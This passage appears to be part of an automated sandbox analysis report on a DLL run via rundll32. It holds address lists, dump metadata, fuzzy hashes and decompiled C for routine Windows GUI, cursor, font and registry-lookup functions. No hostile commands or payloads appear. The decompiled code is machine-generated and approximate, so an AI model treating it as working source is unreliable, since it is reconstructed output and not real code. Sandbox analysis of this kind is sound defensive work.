                                                                                                        0x1000486e
                                                                                                        0x10004873
                                                                                                        0x10004875
                                                                                                        0x10004875
                                                                                                        0x10004875
                                                                                                        0x10004875
                                                                                                        0x1000487c
                                                                                                        0x10004881
                                                                                                        0x10004886
                                                                                                        0x10004888
                                                                                                        0x10004888
                                                                                                        0x10004888
                                                                                                        0x10004888
                                                                                                        0x10004890
                                                                                                        0x100048a3
                                                                                                        0x100048aa
                                                                                                        0x100048b0
                                                                                                        0x100048b2
                                                                                                        0x100048b8
                                                                                                        0x100048c7
                                                                                                        0x100048c7
                                                                                                        0x100048e2
                                                                                                        0x100048e6
                                                                                                        0x100048eb
                                                                                                        0x100048f0
                                                                                                        0x100048f2
                                                                                                        0x100048f2
                                                                                                        0x100048f2
                                                                                                        0x100048f2
                                                                                                        0x100048f7
                                                                                                        0x100048fe
                                                                                                        0x10004903
                                                                                                        0x10004905
                                                                                                        0x10004905
                                                                                                        0x10004905
                                                                                                        0x10004905
                                                                                                        0x10004916
                                                                                                        0x10004917
                                                                                                        0x1000491c
                                                                                                        0x1000491e
                                                                                                        0x10004921
                                                                                                        0x10004929
                                                                                                        0x10004935
                                                                                                        0x10004935
                                                                                                        0x10004945
                                                                                                        0x10004951
                                                                                                        0x1000495b
                                                                                                        0x1000495f
                                                                                                        0x10004967
                                                                                                        0x1000496b
                                                                                                        0x1000496f
                                                                                                        0x10004977
                                                                                                        0x10004983
                                                                                                        0x1000498f
                                                                                                        0x10004994
                                                                                                        0x100049ab
                                                                                                        0x100049b0
                                                                                                        0x100049b2
                                                                                                        0x100049bd
                                                                                                        0x100049cd
                                                                                                        0x100049cd
                                                                                                        0x100049d1
                                                                                                        0x100049d1
                                                                                                        0x100049de
                                                                                                        0x100049f9
                                                                                                        0x10004a2c
                                                                                                        0x10004a41
                                                                                                        0x10004a4e
                                                                                                        0x10004a52
                                                                                                        0x10004a5e
                                                                                                        0x10004a62
                                                                                                        0x10004a66
                                                                                                        0x10004a6a
                                                                                                        0x10004a6c
                                                                                                        0x10004a70
                                                                                                        0x10004a74
                                                                                                        0x10004a7e
                                                                                                        0x10004a80
                                                                                                        0x10004a84
                                                                                                        0x10004a84
                                                                                                        0x10004a8c
                                                                                                        0x10004a8f
                                                                                                        0x10004a8f
                                                                                                        0x10004a93
                                                                                                        0x10004a98
                                                                                                        0x10004a9b
                                                                                                        0x10004aab
                                                                                                        0x10004840
                                                                                                        0x10004846
                                                                                                        0x10004846

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$MessageSend$ClientEmptyInflate
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 4200520382-440804003
                                                                                                        • Opcode ID: 2abcfaea274a2369570987d7606b8ce910d31afa8cd17898d7b212efd0927606
                                                                                                        • Instruction ID: 0ec299595f4385728e86dd1fcda15854f36270291178d9ea1715332580119b07
                                                                                                        • Opcode Fuzzy Hash: 2abcfaea274a2369570987d7606b8ce910d31afa8cd17898d7b212efd0927606
                                                                                                        • Instruction Fuzzy Hash: D28100B5208301AFD308CF68C890A6FB7E9FFC8754F008A1DF99597295DA70E945CB96
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000E98B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E1000E98B(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed int _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_t75 = _a28;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_t13 =  &_v40;
					 *_t13 = _v40 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x20));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t87 = GetDlgCtrlID(_t91) & 0x0000ffff;
					_t64 = E1000E60C(_t75, _t87, _t91, __eflags, _t91);
					__eflags = _t87 - _a12;
					if(__eflags != 0) {
						__eflags = _t87 - _a4;
						if(__eflags >= 0) {
							__eflags = _t87 - _a8;
							if(__eflags <= 0) {
								__eflags = _t64;
								if(__eflags != 0) {
									SendMessageA(_t91, 0x361, 0,  &_v40);
								}
							}
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						__eflags = _v8;
						if(_v8 != 0) {
							_t62 = E1000E5E5(0, _t75, _t92, _v8);
							__eflags = _a24 - 2;
							if(_a24 == 2) {
								_t85 = _a20;
								_v36.left = _v36.left +  *_t85;
								_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
								_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
								_t45 =  &(_v36.bottom);
								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
								__eflags =  *_t45;
							}
							__eflags = _a16 & 0x00008000;
							if((_a16 & 0x00008000) == 0) {
								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
								_t62 = E1000C776( &_v40, _v8,  &_v36);
							}
						}
					}
					__eflags = _v40;
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}





















                                                                                                        0x1000e99a
                                                                                                        0x1000e99c
                                                                                                        0x1000e9a0
                                                                                                        0x1000e9a3
                                                                                                        0x1000e9a6
                                                                                                        0x1000e9a9
                                                                                                        0x1000e9ac
                                                                                                        0x1000e9be
                                                                                                        0x1000e9ae
                                                                                                        0x1000e9b1
                                                                                                        0x1000e9b2
                                                                                                        0x1000e9b3
                                                                                                        0x1000e9b4
                                                                                                        0x1000e9b4
                                                                                                        0x1000e9c7
                                                                                                        0x1000e9cf
                                                                                                        0x1000e9d2
                                                                                                        0x1000e9e1
                                                                                                        0x1000e9e1
                                                                                                        0x1000e9e1
                                                                                                        0x1000e9d4
                                                                                                        0x1000e9dc
                                                                                                        0x1000e9dc
                                                                                                        0x1000e9e8
                                                                                                        0x1000ea34
                                                                                                        0x1000ea34
                                                                                                        0x1000ea38
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000e9fa
                                                                                                        0x1000e9fd
                                                                                                        0x1000ea02
                                                                                                        0x1000ea05
                                                                                                        0x1000ea0c
                                                                                                        0x1000ea0f
                                                                                                        0x1000ea11
                                                                                                        0x1000ea14
                                                                                                        0x1000ea16
                                                                                                        0x1000ea18
                                                                                                        0x1000ea25
                                                                                                        0x1000ea25
                                                                                                        0x1000ea18
                                                                                                        0x1000ea14
                                                                                                        0x1000ea07
                                                                                                        0x1000ea07
                                                                                                        0x1000ea07
                                                                                                        0x1000ea2e
                                                                                                        0x1000ea2e
                                                                                                        0x1000ea3e
                                                                                                        0x1000ea6a
                                                                                                        0x1000ea6d
                                                                                                        0x1000ea6f
                                                                                                        0x1000ea72
                                                                                                        0x1000ea77
                                                                                                        0x1000ea7c
                                                                                                        0x1000ea80
                                                                                                        0x1000ea82
                                                                                                        0x1000ea87
                                                                                                        0x1000ea8d
                                                                                                        0x1000ea93
                                                                                                        0x1000ea99
                                                                                                        0x1000ea99
                                                                                                        0x1000ea99
                                                                                                        0x1000ea99
                                                                                                        0x1000ea9c
                                                                                                        0x1000eaa2
                                                                                                        0x1000eaad
                                                                                                        0x1000eabb
                                                                                                        0x1000eabb
                                                                                                        0x1000eaa2
                                                                                                        0x1000ea72
                                                                                                        0x1000eac0
                                                                                                        0x1000eac3
                                                                                                        0x1000eac8
                                                                                                        0x1000eac8
                                                                                                        0x1000ea40
                                                                                                        0x1000ea43
                                                                                                        0x1000ea54
                                                                                                        0x1000ea5a
                                                                                                        0x1000ea60
                                                                                                        0x1000ea63
                                                                                                        0x1000ea65
                                                                                                        0x1000ea45
                                                                                                        0x1000ea4c
                                                                                                        0x1000ea4c
                                                                                                        0x1000ea43
                                                                                                        0x1000ead2

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 1228040700-440804003
                                                                                                        • Opcode ID: fc6f81b4aec67edd1c8f02d8465793d820ecf22571a196a6bb79340ddcd46367
                                                                                                        • Instruction ID: 64df79ced9b171c7ce2070e7ad973eb323d41e2062895605a3a6627423db4387
                                                                                                        • Opcode Fuzzy Hash: fc6f81b4aec67edd1c8f02d8465793d820ecf22571a196a6bb79340ddcd46367
                                                                                                        • Instruction Fuzzy Hash: 1F411671A0069ADFEF10DF94C8849EEB7B5FF0D380B15816AE905B6254D730AE40CFA6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10016E44, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 56%
                                                                                                        			E10016E44(void* __ecx, void* __edi, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __esi;
				void* __ebp;
				int _t31;
				void* _t48;
				void* _t56;
				void* _t57;
				intOrPtr _t58;
				void* _t63;
				void* _t68;
				void* _t69;

				_t57 = __edi;
				_t49 = __ecx;
				_t48 = __ecx;
				_t63 = E1000EFFA(__ecx);
				_t70 = _t63;
				if(_t63 == 0) {
					E1000836F(_t48, _t49, __edi, _t63, _t70);
				}
				_push(_t57);
				_t58 = E1000E5E5(_t48, _t49, _t69, GetParent( *(_t63 + 0x20)));
				_v8 = _t58;
				UpdateWindow( *(_t63 + 0x20));
				_t71 = _t58;
				if(_t58 != 0) {
					UpdateWindow( *(_t58 + 0x20));
					GetClientRect( *(_t58 + 0x20),  &_v40);
					E10008D4F(_t58,  &_v40);
					ClipCursor( &_v40);
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_a12 = E1002E460(_t48 + 0x94, _t56, _t71, _t48, _a8, _a12, 0, _v8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t31 = ClipCursor(0);
				if(_a12 != 0) {
					_t68 = E1000F8F1(_t48);
					E10008D4F(_t48,  &_v24);
					E10008D13(_t68,  &_v24);
					return SendMessageA( *(_t68 + 0x20), 0x369, GetDlgCtrlID( *(_t48 + 0x20)) & 0x0000ffff,  &_v24);
				}
				return _t31;
			}

















                                                                                                        0x10016e44
                                                                                                        0x10016e44
                                                                                                        0x10016e4c
                                                                                                        0x10016e53
                                                                                                        0x10016e55
                                                                                                        0x10016e57
                                                                                                        0x10016e59
                                                                                                        0x10016e59
                                                                                                        0x10016e5e
                                                                                                        0x10016e77
                                                                                                        0x10016e79
                                                                                                        0x10016e7c
                                                                                                        0x10016e7e
                                                                                                        0x10016e80
                                                                                                        0x10016e85
                                                                                                        0x10016e8e
                                                                                                        0x10016e9a
                                                                                                        0x10016ea3
                                                                                                        0x10016ea3
                                                                                                        0x10016eb5
                                                                                                        0x10016eb6
                                                                                                        0x10016ebc
                                                                                                        0x10016ec7
                                                                                                        0x10016ecd
                                                                                                        0x10016edb
                                                                                                        0x10016edc
                                                                                                        0x10016edd
                                                                                                        0x10016ede
                                                                                                        0x10016ee4
                                                                                                        0x10016ee5
                                                                                                        0x10016ee6
                                                                                                        0x10016ee9
                                                                                                        0x10016eea
                                                                                                        0x10016ef5
                                                                                                        0x10016efe
                                                                                                        0x10016f06
                                                                                                        0x10016f11
                                                                                                        0x00000000
                                                                                                        0x10016f2f
                                                                                                        0x10016f38

                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 10016E62
                                                                                                        • UpdateWindow.USER32(?), ref: 10016E7C
                                                                                                        • UpdateWindow.USER32(?), ref: 10016E85
                                                                                                        • GetClientRect.USER32 ref: 10016E8E
                                                                                                        • ClipCursor.USER32(?,?), ref: 10016EA3
                                                                                                        • ClipCursor.USER32(00000000,?,?,?,00000000,?), ref: 10016EEA
                                                                                                        • GetDlgCtrlID.USER32 ref: 10016F19
                                                                                                        • SendMessageA.USER32 ref: 10016F2F
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClipCursorUpdateWindow$ClientCtrlException@8H_prolog3MessageParentRectSendThrow
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 2972496148-440804003
                                                                                                        • Opcode ID: 01f6b26919a2de1e7b43cc7ead0e1aea67d7139ecd04a57b7f05599f88471fc9
                                                                                                        • Instruction ID: 76eb8f832bc9fbe54b691d3a70d979fc868f98c1584abcba34e77cf260b628b4
                                                                                                        • Opcode Fuzzy Hash: 01f6b26919a2de1e7b43cc7ead0e1aea67d7139ecd04a57b7f05599f88471fc9
                                                                                                        • Instruction Fuzzy Hash: 33316D3650051AABDB02DF64CC85AEF77BAFF48344B100125FD45BA161EB72AE158BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002F197, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1002F197(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t35;
				void* _t37;
				void* _t42;
				int* _t43;
				void* _t46;

				_t43 = 0;
				_v12 = 0;
				_v20 = E10001DE0(_a8, 0x104);
				_v16 = 0x104;
				_t42 = RegOpenKeyA;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, "CLSID",  &_v12) == 0) {
					_push(_t37);
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x100630e0, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t43 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
					_pop(_t37);
				}
				E10001C90(_t37, _a8, _t42, _t46, 0xffffffff);
				return _t43;
			}
















                                                                                                        0x1002f1a7
                                                                                                        0x1002f1aa
                                                                                                        0x1002f1b2
                                                                                                        0x1002f1be
                                                                                                        0x1002f1c1
                                                                                                        0x1002f1cc
                                                                                                        0x1002f1d3
                                                                                                        0x1002f1d5
                                                                                                        0x1002f1dd
                                                                                                        0x1002f1ed
                                                                                                        0x1002f1fb
                                                                                                        0x1002f202
                                                                                                        0x1002f218
                                                                                                        0x1002f225
                                                                                                        0x1002f227
                                                                                                        0x1002f228
                                                                                                        0x1002f228
                                                                                                        0x1002f22d
                                                                                                        0x1002f22d
                                                                                                        0x1002f232
                                                                                                        0x1002f234
                                                                                                        0x1002f234
                                                                                                        0x1002f23a
                                                                                                        0x1002f244

                                                                                                        APIs
                                                                                                        • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 1002F1CF
                                                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 1002F1E3
                                                                                                        • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 1002F1FE
                                                                                                        • RegQueryValueExA.ADVAPI32(?,100630E0,00000000,?,?,?), ref: 1002F218
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1002F228
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1002F22D
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1002F232
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpen$QueryValue
                                                                                                        • String ID: CLSID$InProcServer32
                                                                                                        • API String ID: 3523390698-323508013
                                                                                                        • Opcode ID: 383daeb56b95e74e91fc455795058530c7a6b8b4a4811ca313cc554ef7f80c07
                                                                                                        • Instruction ID: 1a2a334b55ca9bb377416e6b09101109fede77e275011b5a38e51e03a7b6de86
                                                                                                        • Opcode Fuzzy Hash: 383daeb56b95e74e91fc455795058530c7a6b8b4a4811ca313cc554ef7f80c07
                                                                                                        • Instruction Fuzzy Hash: C3113776900129BBEF01EF95CC80DEEBBB9EF446E0F108166F904A6160E7319B55DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10011941, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10011941() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x10071884; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x10071884);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x10071884; // 0xffffffff
					return _t10;
				}
				return _t4;
			}










                                                                                                        0x10011942
                                                                                                        0x1001194a
                                                                                                        0x10011971
                                                                                                        0x10011973
                                                                                                        0x1001198a
                                                                                                        0x1001198e
                                                                                                        0x10011994
                                                                                                        0x10011994
                                                                                                        0x100119a2
                                                                                                        0x100119aa
                                                                                                        0x100119b1
                                                                                                        0x100119b4
                                                                                                        0x100119b4
                                                                                                        0x100119bc
                                                                                                        0x100119c2
                                                                                                        0x00000000
                                                                                                        0x100119ca
                                                                                                        0x100119cc

                                                                                                        APIs
                                                                                                        • GetDC.USER32(00000000), ref: 10011953
                                                                                                        • GetSystemMetrics.USER32 ref: 10011977
                                                                                                        • CreateFontA.GDI32(00000000,?,?,?,?,?,10012C6B,00001000,?,?,?,?,?,?), ref: 1001197E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 10011992
                                                                                                        • GetCharWidthA.GDI32(00000000,00000036,00000036,10071884), ref: 100119A2
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 100119B1
                                                                                                        • DeleteObject.GDI32(00000000), ref: 100119B4
                                                                                                        • ReleaseDC.USER32 ref: 100119BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                                                        • String ID: Marlett
                                                                                                        • API String ID: 1397664628-3688754224
                                                                                                        • Opcode ID: 2f783172487a53513df15c131d4ab524591d224df9edbcf86ca68e63179a48fb
                                                                                                        • Instruction ID: fb1d621fdccb9e40e5e9409823b2dd7cd1bfa2cd1470f5582957c083eed9e7f1
                                                                                                        • Opcode Fuzzy Hash: 2f783172487a53513df15c131d4ab524591d224df9edbcf86ca68e63179a48fb
                                                                                                        • Instruction Fuzzy Hash: 10011E721022347FE3659B268C8DEDF3EADEF46AF5F010504FA5AA6190CB358944C7B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10032F90, Relevance: 15.2, APIs: 10, Instructions: 184timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E10032F90(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				struct tagRECT _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t63;
				signed short _t69;
				signed int _t79;
				signed int _t80;
				void* _t87;
				void* _t91;
				intOrPtr _t93;
				long _t94;
				signed short _t98;
				signed int _t108;
				signed short _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				void* _t114;

				_t113 = __ecx;
				GetCursorPos( &_v20);
				GetWindowRect( *(_t113 + 0x20),  &_v44);
				_t53 =  *((intOrPtr*)(_t113 + 0x70));
				_t111 = 0;
				if(_t53 == 0x7923 || _t53 == 0x7922) {
					_t93 = _v20.y;
					if(_t93 >= _v44.top) {
						__eflags = _t93 - _v44.bottom;
						if(_t93 > _v44.bottom) {
							_t111 = 0x791d;
						}
					} else {
						_t111 = 0x7917;
					}
				}
				if(_t53 == 0x7923 || _t53 == 0x7921) {
					_t94 = _v20.x;
					if(_t94 >= _v44.left) {
						__eflags = _t94 - _v44.right;
						if(_t94 > _v44.right) {
							__eflags = _t111;
							if(_t111 != 0) {
								__eflags = _t53 - 0x7923;
								if(_t53 == 0x7923) {
									_t111 = _t111 + 1;
									__eflags = _t111;
								}
							} else {
								_t111 = 0x791b;
							}
						}
					} else {
						if(_t111 != 0) {
							__eflags = _t53 - 0x7923;
							if(_t53 == 0x7923) {
								_t111 = _t111 - 1;
							}
						} else {
							_t111 = 0x7919;
						}
					}
				}
				if( *((intOrPtr*)(_t113 + 0x6c)) == 0) {
					__eflags = _t111;
					if(__eflags != 0) {
						SetCursor(LoadCursorA( *(E1000AB19(0x7923, _t111, _t113, __eflags) + 0xc), _t111 & 0x0000ffff));
						_t58 = _v20.x;
						__eflags = _t58 - _v44.right;
						if(_t58 <= _v44.right) {
							__eflags = _t58 - _v44.left;
							if(_t58 >= _v44.left) {
								_t26 =  &_v12;
								 *_t26 = _v12 & 0x00000000;
								__eflags =  *_t26;
								L30:
								_t59 = _v20.y;
								__eflags = _t59 - _v44.bottom;
								if(_t59 <= _v44.bottom) {
									__eflags = _t59 - _v44.top;
									if(_t59 >= _v44.top) {
										_t34 =  &_v8;
										 *_t34 = _v8 & 0x00000000;
										__eflags =  *_t34;
										L36:
										_t112 = E1000F8F1(_t113);
										_t61 =  *((intOrPtr*)(_t113 + 0x70));
										__eflags = _t61 - 0x7923;
										if(_t61 == 0x7923) {
											L39:
											_t98 = 1;
											__eflags = 1;
											L40:
											__eflags = _t61 - 0x7923;
											if(_t61 == 0x7923) {
												L43:
												_t63 = 1;
												__eflags = 1;
												L44:
												 *((intOrPtr*)( *_t112 + 0x184))( &_v28, _v12, _v8, _t63, _t98);
												E10011739(_t113, 0);
												_t69 = E10025684(0x1005c558, E1000E5E5(0, _t113, _t114, GetParent( *(_t112 + 0x20))));
												__eflags = _t69;
												_push(1);
												_push(_v24);
												_push(_v28);
												if(_t69 != 0) {
													 *((intOrPtr*)( *_t69 + 0x17c))(_t112);
												} else {
													 *((intOrPtr*)( *_t112 + 0x13c))();
												}
												UpdateWindow( *(_t113 + 0x20));
												__eflags =  *((intOrPtr*)(_t113 + 0x64)) - 0x10;
												return E100117F5(_t113, 0x10098d40,  *((intOrPtr*)(_t113 + 0x64)) - 0x10,  *((intOrPtr*)(_t113 + 0x68)) - 0x10, 0, 0, 0x51);
											}
											__eflags = _t61 - 0x7921;
											if(_t61 == 0x7921) {
												goto L43;
											}
											_t63 = 0;
											goto L44;
										}
										__eflags = _t61 - 0x7922;
										if(_t61 == 0x7922) {
											goto L39;
										}
										_t98 = 0;
										goto L40;
									}
									_t79 = _t59 - _v44.top;
									__eflags = _t79;
									L34:
									_v8 = _t79;
									goto L36;
								}
								_t79 = _t59 - _v44.bottom;
								goto L34;
							}
							_t80 = _t58 - _v44.left;
							__eflags = _t80;
							L28:
							_v12 = _t80;
							goto L30;
						}
						_t80 = _t58 - _v44.right;
						goto L28;
					}
					return SetCursor( *(_t113 + 0x74));
				}
				KillTimer( *(_t113 + 0x20), 0xe000);
				ReleaseCapture();
				SetCursor(0);
				_t91 = E1000F8F1(_t113);
				_t87 =  *((intOrPtr*)( *_t113 + 0x60))();
				_t108 =  *(_t91 + 0x58);
				if(_t108 != 0) {
					_t87 =  *((intOrPtr*)( *_t108 + 4))(1);
				}
				 *(_t91 + 0x58) =  *(_t91 + 0x58) & 0x00000000;
				return _t87;
			}































                                                                                                        0x10032f9d
                                                                                                        0x10032f9f
                                                                                                        0x10032fac
                                                                                                        0x10032fb2
                                                                                                        0x10032fba
                                                                                                        0x10032fbe
                                                                                                        0x10032fc7
                                                                                                        0x10032fcd
                                                                                                        0x10032fd6
                                                                                                        0x10032fd9
                                                                                                        0x10032fdb
                                                                                                        0x10032fdb
                                                                                                        0x10032fcf
                                                                                                        0x10032fcf
